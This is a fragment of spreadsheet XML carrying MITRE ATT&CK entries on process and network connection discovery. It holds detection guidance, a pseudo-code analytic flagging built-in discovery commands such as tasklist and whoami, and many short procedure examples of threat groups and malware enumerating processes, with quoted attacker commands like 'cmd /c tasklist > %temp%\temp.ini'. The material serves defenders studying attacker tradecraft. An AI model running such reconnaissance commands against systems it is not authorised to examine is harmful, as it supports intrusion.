[SysUpdate](https://attack.mitre.org/software/S0663) can contact the DNS server operated by Google as part of its C2 establishment process.(Citation: Lunghi Iron Tiger Linux) 
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) can make `Ping` GET HTTP requests to its C2 server at regular intervals for network connectivity checks.(Citation: MalwareBytes WoodyRAT Aug 2022)
</t>
  </si>
  <si>
    <t>Command Execution
Monitor executed commands and arguments for actions that may attempt to get information about running processes on a system.
OS API Execution
Monitor for API calls may attempt to get information about running processes on a system. 
Process Creation
Monitor for newly executed processes that may attempt to get information about running processes on a system. To be effective in deciphering malicious and benign activity, the full command line is essential. Similarly, having information about the parent process can help with making decisions and tuning to an environment.
Because these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined white- or blacklists, and should consider looking at an anomaly detection approach, so that this information can be learned dynamically.
Within the built-in Windows Commands:
- hostname
- ipconfig
- net
- quser
- qwinsta
- sc with flags query, queryex, qc
- systeminfo
- tasklist
- dsquery
- whoami
Note dsquery is only pre-existing on Windows servers.
&lt;h4&gt;Analytic 1 - Host Discovery Commands &lt;/h4&gt;
&lt;code&gt;info_command = filter process where (
 exe == "hostname.exe" or
 exe == "ipconfig.exe" or
 exe == "net.exe" or
 exe == "quser.exe" or
 exe == "qwinsta.exe" or
 exe == "sc" and (command_line match " query" or command_line match " qc")) or
 exe == "systeminfo.exe" or
 exe == "tasklist.exe" or
 exe == "whoami.exe")&lt;/code&gt;
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.(Citation: DFIR Conti Bazar Nov 2021)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to obtain a list of all running processes.(Citation: Talos Frankenstein June 2019)
FunnyDream
During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [Tasklist](https://attack.mitre.org/software/S0057) on targeted systems.(Citation: Bitdefender FunnyDream Campaign November 2020)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `tasklist` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors obtained a list of running processes on a victim machine using `cmd /c tasklist &gt; %temp%\temp.ini`.(Citation: McAfee Honeybee)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors used `tasklist` to collect a list of running processes on an infected system.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used multiple command-line utilities to enumerate running processes.(Citation: Volexity SolarWinds)(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: CrowdStrike StellarParticle January 2022)
APT1
[APT1](https://attack.mitre.org/groups/G0006) gathered a list of running processes on the system using &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: Mandiant APT1)
APT28
An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.(Citation: Unit 42 Playbook Dec 2017)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that can list out currently running processes.(Citation: FireEye Clandestine Fox)(Citation: evolution of pirpi)
APT37
[APT37](https://attack.mitre.org/groups/G0067)'s Freenki malware lists running processes using the Microsoft Windows API.(Citation: Talos Group123)
APT38
[APT38](https://attack.mitre.org/groups/G0082) leveraged Sysmon to understand the processes, services in the organization.(Citation: FireEye APT38 Oct 2018)
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has used &lt;code&gt;tasklist&lt;/code&gt; to enumerate processes and find a specific string.(Citation: Kaspersky Andariel Ransomware June 2021)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;tasklist&lt;/code&gt; to enumerate processes.(Citation: NCC Group Chimera January 2021)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) malware can collect a list of running processes on a system.(Citation: Securelist Darkhotel Aug 2015)
Deep Panda
[Deep Panda](https://attack.mitre.org/groups/G0009) uses the Microsoft [Tasklist](https://attack.mitre.org/software/S0057) utility to list processes running on systems.(Citation: Alperovitch 2014)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used tools to enumerate processes on target hosts including Process Explorer.(Citation: Symantec Shuckworm January 2022)(Citation: Unit 42 Gamaredon February 2022)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used `tasklist` to enumerate processes.(Citation: Rapid7 HAFNIUM Mar 2021)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has enumerated processes on targeted systems.(Citation: Kaspersky Lyceum October 2021)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126)’s shellcode attempted to find the process ID of the current process.(Citation: Zscaler Higaisa 2020)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has used a reconnaissance module to identify active processes and other associated loaded modules.(Citation: Symantec Inception Framework March 2018)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) performs process discovery using &lt;code&gt;tasklist&lt;/code&gt; commands.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) can gather a list of all processes running on a victim's machine.(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) also gathers process times.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)(Citation: TrendMicro macOS Dacls May 2020)(Citation: Lazarus APT January 2022)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware can list running processes.(Citation: Unit 42 Magic Hound Feb 2017)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) actors obtained a list of active processes on the victim and sent them to C2 servers.(Citation: DustySky)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to obtain a list of running processes on the system.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;tasklist /v&lt;/code&gt; to determine active process information.(Citation: Avira Mustang Panda January 2020)	
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;tasklist&lt;/code&gt; on a victim's machine.(Citation: Palo Alto OilRig May 2016)
Poseidon Group
After compromising a victim, [Poseidon Group](https://attack.mitre.org/groups/G0033) lists all running processes.(Citation: Kaspersky Poseidon Group)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) can detect a running process's PID on the infected machine.(Citation: Anomali Rocke March 2019)	
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to identify running processes on the victim's machine.(Citation: ATT Sidewinder January 2021)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers a list of running processes.(Citation: Citizen Lab Stealth Falcon May 2016)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for rival malware and removes it if found.(Citation: Trend Micro TeamTNT) [TeamTNT](https://attack.mitre.org/groups/G0139) has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools.(Citation: Cisco Talos Intelligence Group)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) is capable of enumerating the running processes on the system using &lt;code&gt;pslist&lt;/code&gt;.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover running processes using the &lt;code&gt;tasklist /v&lt;/code&gt; command.(Citation: Kaspersky Turla) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also enumerated processes associated with specific open ports or named pipes.(Citation: ESET Turla PowerShell May 2019)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has enumerated running processes on targeted systems.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used malware to enumerate active processes.(Citation: BlackBerry Bahamut)
Winnti Group
[Winnti Group](https://attack.mitre.org/groups/G0044) looked for a specific process running on infected servers.(Citation: Kaspersky Winnti April 2013)
4H RAT
[4H RAT](https://attack.mitre.org/software/S0065) has the capability to obtain a listing of running processes (including loaded modules).(Citation: CrowdStrike Putter Panda)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list running processes.(Citation: ESET Sednit Part 2)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can list the current running processes on the system.(Citation: Fortinet Agent Tesla June 2017)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can enumerate the current process on a compromised host.(Citation: Malwarebytes Kimsuky June 2021)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to enumerate loaded modules for a process.(Citation: CheckPoint Naikon May 2020).
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) searches for different processes on the system.(Citation: Cybereason Astaroth Feb 2019)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) can examine running processes to determine if a debugger is present.(Citation: Telefonica Snip3 December 2021)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) has collected information about running processes.(Citation: Arxiv Avaddon Feb 2021)
Avenger
[Avenger](https://attack.mitre.org/software/S0473) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to identify running processes.(Citation: Trend Micro Tick November 2019)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has discovered system processes by calling `RmGetList`.(Citation: Malwarebytes AvosLocker Jul 2021)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can collect a list of running processes by calling CreateToolhelp32Snapshot.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)
BACKSPACE
[BACKSPACE](https://attack.mitre.org/software/S0031) may collect information about running processes.(Citation: FireEye APT30)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can retrieve a list of running processes from a compromised machine.(Citation: BitDefender BADHATCH Mar 2021) 
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) can list running processes.(Citation: Palo Alto Networks BBSRAT)
BISCUIT
[BISCUIT](https://attack.mitre.org/software/S0017) has a command to enumerate running processes and identify their owners.(Citation: Mandiant APT1 Appendix)
BLACKCOFFEE
[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to discover processes.(Citation: FireEye APT17)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect process filenames and SID authority level.(Citation: Volexity InkySquid BLUELIGHT August 2021)
Babuk
[Babuk](https://attack.mitre.org/software/S0638) has the ability to check running processes on a targeted system.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)	
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about running processes.(Citation: Symantec Dragonfly)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) can enumerate all running processes to compare hashes.(Citation: Secure List Bad Rabbit)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) identifies processes and collects the process ids.(Citation: McAfee Bankshot)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can identity the current process on a compromised host.(Citation: Cybereason Bazar July 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) can obtain a list of running processes on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered a process list by using [Tasklist](https://attack.mitre.org/software/S0057).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)(Citation: ESET BlackEnergy Jan 2016)
Bonadan
[Bonadan](https://attack.mitre.org/software/S0486) can use the &lt;code&gt;ps&lt;/code&gt; command to discover other cryptocurrency miners active on the system.(Citation: ESET ForSSHe December 2018)
Brave Prince
[Brave Prince](https://attack.mitre.org/software/S0252) lists the running processes.(Citation: McAfee Gold Dragon)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can enumerate all processes and locate specific process IDs (PIDs).(Citation: Palo Alto Brute Ratel July 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can identify processes associated with analytical tools.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)(Citation: Medium Ali Salem Bumblebee April 2022)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) has used the &lt;code&gt;ps&lt;/code&gt; command to list processes.(Citation: MacKeeper Bundlore Apr 2019)
CaddyWiper
[CaddyWiper](https://attack.mitre.org/software/S0693) can obtain a list of current processes.(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 )
Cannon
[Cannon](https://attack.mitre.org/software/S0351) can obtain a list of processes running on the system.(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) lists running processes.(Citation: FireEye CARBANAK June 2017)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has collected a list of running processes.(Citation: Trusteer Carberp October 2010)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) can list the processes on the victim’s machine.(Citation: ESET Carbon Mar 2017)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) contains watchdog functionality that ensures its process is always running, else spawns a new instance.(Citation: PaloAlto CardinalRat Apr 2017)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can gather a list of processes running on the machine.(Citation: ClearSky Lebanese Cedar Jan 2021) 
ChChes
[ChChes](https://attack.mitre.org/software/S0144) collects its process identifier (PID) on the victim.(Citation: Palo Alto menuPass Feb 2017)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) has the ability to list running processes through the use of `tasklist`.(Citation: Check Point APT35 CharmPower January 2022)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can enumerate processes on a targeted system.(Citation: Trend Micro DRBControl February 2020)
Clop
[Clop](https://attack.mitre.org/software/S0611) can enumerate all processes on the victim's machine.(Citation: Mcafee Clop Aug 2019)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154)'s Beacon payload can collect information on process details.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) uses the &lt;code&gt;tasklist&lt;/code&gt; to view running processes on the victim’s machine.(Citation: Palo Alto Comnie)
Conti
[Conti](https://attack.mitre.org/software/S0575) can enumerate through all open processes to search for any that have the string “sql” in their process name.(Citation: CarbonBlack Conti July 2020)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) contains a command to list processes.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)	 
Cuba
[Cuba](https://attack.mitre.org/software/S0625) can enumerate processes running on a victim's machine.(Citation: McAfee Cuba April 2021)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can enumerate the process it is currently running under.(Citation: NCSC Cyclops Blink February 2022)
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694) can enumerate and examine running processes to determine if a debugger is present.(Citation: ClearSky Lazarus Aug 2020)
Dacls
[Dacls](https://attack.mitre.org/software/S0497) can collect data on running and parent processes.(Citation: TrendMicro macOS Dacls May 2020)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) can list active processes running on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can enumerate a list of running processes on a compromised system.(Citation: Secureworks DarkTortilla Aug 2022)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) collects current and parent process IDs.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) has used `CreateToolhelp32Snapshot`, `Process32First`, and `Process32Next` API calls to enumerate the running processes in the system.(Citation: Fortinet Diavol July 2021)
Doki
[Doki](https://attack.mitre.org/software/S0600) has searched for the current process’s PID.(Citation: Intezer Doki July 20)
Donut
[Donut](https://attack.mitre.org/software/S0695) includes subprojects that enumerate and identify information about [Process Injection](https://attack.mitre.org/techniques/T1055) candidates.(Citation: Donut Github)	
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567)’s dropper can list all running processes.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)
Duqu
The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on process details.(Citation: Symantec W32.Duqu)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) collects information about running processes from victims.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)
EKANS
[EKANS](https://attack.mitre.org/software/S0605) looks for processes from a hard-coded list.(Citation: Dragos EKANS)(Citation: FireEye Ransomware Feb 2020)(Citation: IBM Ransomware Trends September 2020)
ELMER
[ELMER](https://attack.mitre.org/software/S0064) is capable of performing process listings.(Citation: FireEye EPS Awakens Part 2)
Elise
[Elise](https://attack.mitre.org/software/S0081) enumerates processes via the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: Accenture Dragonfish Jan 2018)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed enumerating local processes.(Citation: ASEC Emotet 2017)
Empire
[Empire](https://attack.mitre.org/software/S0363) can find information about processes running on local and remote systems.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)
Epic
[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;tasklist /v&lt;/code&gt; command to obtain a list of processes.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has used EnumProcesses() to identify how many process are running in the environment.(Citation: Cyphort EvilBunny Dec 2014)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) collects a list of running processes.(Citation: ESET GreyEnergy Oct 2018)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can list running processes on the localhost.(Citation: ESET Dukes October 2019)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) checks its parent process for indications that it is running in a sandbox setup.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
Final1stspy
[Final1stspy](https://attack.mitre.org/software/S0355) obtains a list of running processes.(Citation: Unit 42 Nokki Oct 2018)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has been used to run the &lt;code&gt;tasklist&lt;/code&gt; command on a compromised system.(Citation: NTT Security Flagpro new December 2021)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can enumerate all Common Language Runtimes (CLRs) and running Application Domains in the compromised AD FS server's &lt;code&gt;Microsoft.IdentityServer.ServiceHost.exe&lt;/code&gt; process.(Citation: MSTIC FoggyWeb September 2021)
FrameworkPOS
[FrameworkPOS](https://attack.mitre.org/software/S0503) can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.(Citation: SentinelOne FrameworkPOS September 2019)
FruitFly
[FruitFly](https://attack.mitre.org/software/S0277) has the ability to list processes on the system.(Citation: objsee mac malware 2017)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to discover processes, including `Bka.exe` and `BkavUtil.exe`.(Citation: Bitdefender FunnyDream Campaign November 2020)
Fysbis
[Fysbis](https://attack.mitre.org/software/S0410) can collect information about running processes.(Citation: Fysbis Dr Web Analysis) 
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can enumerate running processes.(Citation: ESET Gelsemium June 2021)
GeminiDuke
[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on running processes and environment variables from the victim.(Citation: F-Secure The Dukes)
Get2
[Get2](https://attack.mitre.org/software/S0460) has the ability to identify running processes on an infected host.(Citation: Proofpoint TA505 October 2019)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) checks the running processes on the victim’s machine.(Citation: McAfee Gold Dragon)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has checked for the Google Updater process to ensure [Goopy](https://attack.mitre.org/software/S0477) was loaded properly.(Citation: Cybereason Cobalt Kitty 2017)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can identify installed security tools based on process names.(Citation: ESET Grandoreiro April 2020)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) lists the running processes on the system.(Citation: Talos GravityRAT)
HALFBAKED
[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain information about running processes on the victim.(Citation: FireEye FIN7 April 2017)
HELLOKITTY
[HELLOKITTY](https://attack.mitre.org/software/S0617) can search for specific processes to terminate.(Citation: FireEye FiveHands April 2021)
Helminth
[Helminth](https://attack.mitre.org/software/S0170) has used [Tasklist](https://attack.mitre.org/software/S0057) to get information on processes.(Citation: Unit 42 Playbook Dec 2017)
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can gather process information.(Citation: SentinelOne Aoqin Dragon June 2022)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list running processes on the infected host.(Citation: Carbon Black HotCroissant April 2020)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can monitor processes.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has a "Process Watcher" feature to monitor processes in case the client ever crashes or gets closed.(Citation: Imminent Unit42 Dec2019)
Industroyer2
[Industroyer2](https://attack.mitre.org/software/S1072) has the ability to cyclically enumerate running processes such as PServiceControl.exe, PService_PDD.exe, and other targets supplied through a hardcoded configuration.(Citation: Industroyer2 Mandiant April 2022)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can obtain a list of running processes.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
IronNetInjector
[IronNetInjector](https://attack.mitre.org/software/S0581) can identify processes via C# methods such as &lt;code&gt;GetProcessesByName&lt;/code&gt; and running [Tasklist](https://attack.mitre.org/software/S0057) with the Python &lt;code&gt;os.popen&lt;/code&gt; function.(Citation: Unit 42 IronNetInjector February 2021 )
Ixeshe
[Ixeshe](https://attack.mitre.org/software/S0015) can list running processes.(Citation: Trend Micro IXESHE 2012)
JHUHUGIT
[JHUHUGIT](https://attack.mitre.org/software/S0044) obtains a list of running processes on the victim.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can list running processes.(Citation: Microsoft PLATINUM April 2016)
Javali
[Javali](https://attack.mitre.org/software/S0528) can monitor processes for open browsers and custom banking applications.(Citation: Securelist Brazilian Banking Malware July 2020)
KEYMARBLE
[KEYMARBLE](https://attack.mitre.org/software/S0271) can obtain a list of running processes on the system.(Citation: US-CERT KEYMARBLE Aug 2018)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has used the command &lt;code&gt;cmd /c tasklist&lt;/code&gt; to get a snapshot of the current processes on the target machine.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075) can enumerate current running processes on the targeted machine.(Citation: Mandiant Suspected Turla Campaign February 2023)
Kasidet
[Kasidet](https://attack.mitre.org/software/S0088) has the ability to search for a given process name in processes currently running in the system.(Citation: Zscaler Kasidet)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) obtains a list of running processes through WMI querying and the &lt;code&gt;ps&lt;/code&gt; command.(Citation: Unit 42 Kazuar May 2017)
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) has called &lt;code&gt;GetCurrentProcess&lt;/code&gt;.(Citation: Trend Micro KillDisk 2)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) has used ps to list processes.(Citation: Aqua Kinsing April 2020)
Komplex
The OsInfo function in [Komplex](https://attack.mitre.org/software/S0162) collects a running process list.(Citation: Sofacy Komplex Trojan)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of running services with the command &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)
Linfo
[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can retrieve a list of running processes.(Citation: Symantec Linfo May 2012)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) has a plugin designed to obtain a list of processes.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021)
LookBack
[LookBack](https://attack.mitre.org/software/S0582) can list running processes.(Citation: Proofpoint LookBack Malware Aug 2019)
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) used the &lt;code&gt;ps&lt;/code&gt; command to monitor the running processes on the system.(Citation: ESET LoudMiner June 2019)	
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can identify the process that owns remote connections.(Citation: Unit 42 Lucifer June 2020)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) can enumerate running processes.(Citation: ESET DazzleSpy Jan 2022)
Machete
[Machete](https://attack.mitre.org/software/S0409) has a component to check for running processes to look for web browsers.(Citation: ESET Machete July 2019) 
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can enumerate running processes on a machine.(Citation: SentinelLabs Metador Sept 2022)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can search for different processes on a system.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Maze
[Maze](https://attack.mitre.org/software/S0449) has gathered all of the running system processes.(Citation: McAfee Maze March 2020)	
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has performed process name checks and has monitored applications.(Citation: Medium Metamorfo Apr 2020) 
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can check if a specific process is running, such as Kaspersky's `avp.exe`.(Citation: Check Point Meteor Aug 2021)
MobileOrder
[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload information about all running processes to its C2 server.(Citation: Scarlet Mimic Jan 2016)
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) has a command to return a list of running processes.(Citation: Palo Alto MoonWind March 2017)
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256) runs &lt;code&gt;tasklist&lt;/code&gt; to obtain running processes.(Citation: ESET Turla Mosquito Jan 2018)
NETEAGLE
[NETEAGLE](https://attack.mitre.org/software/S0034) can send process listings over the C2 channel.(Citation: FireEye APT30)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can discover processes on compromised hosts.(Citation: FireEye NETWIRE March 2019)
NavRAT
[NavRAT](https://attack.mitre.org/software/S0247) uses &lt;code&gt;tasklist /v&lt;/code&gt; to check running processes.(Citation: Talos NavRAT May 2018)
Nebulae
[Nebulae](https://attack.mitre.org/software/S0630) can enumerate processes on a target system.(Citation: Bitdefender Naikon April 2021)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) has the ability to use `GetWindowThreadProcessId` to identify the process behind a specified window.(Citation: MoustachedBouncer ESET August 2023)
ObliqueRAT
[ObliqueRAT](https://attack.mitre.org/software/S0644) can check for blocklisted process names on a compromised host.(Citation: Talos Oblique RAT March 2021)
OceanSalt
[OceanSalt](https://attack.mitre.org/software/S0346) can collect the name and ID for every process running on the system.(Citation: McAfee Oceansalt Oct 2018)
Orz
[Orz](https://attack.mitre.org/software/S0229) can gather a process list from the victim.(Citation: Proofpoint Leviathan Oct 2017)
OutSteel
[OutSteel](https://attack.mitre.org/software/S1017) can identify running processes on a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
P8RAT
[P8RAT](https://attack.mitre.org/software/S0626) can check for specific processes associated with virtual environments.(Citation: Securelist APT10 March 2021)
PLAINTEE
[PLAINTEE](https://attack.mitre.org/software/S0254) performs the &lt;code&gt;tasklist&lt;/code&gt; command to list running processes.(Citation: Rancor Unit42 J</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
OS API Execution
Monitor for API calls that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Process Creation
Monitor for executed processes that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
FunnyDream
During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [netstat](https://attack.mitre.org/software/S0104) to discover network connections on remote systems.(Citation: Bitdefender FunnyDream Campaign November 2020)
Operation CuckooBees
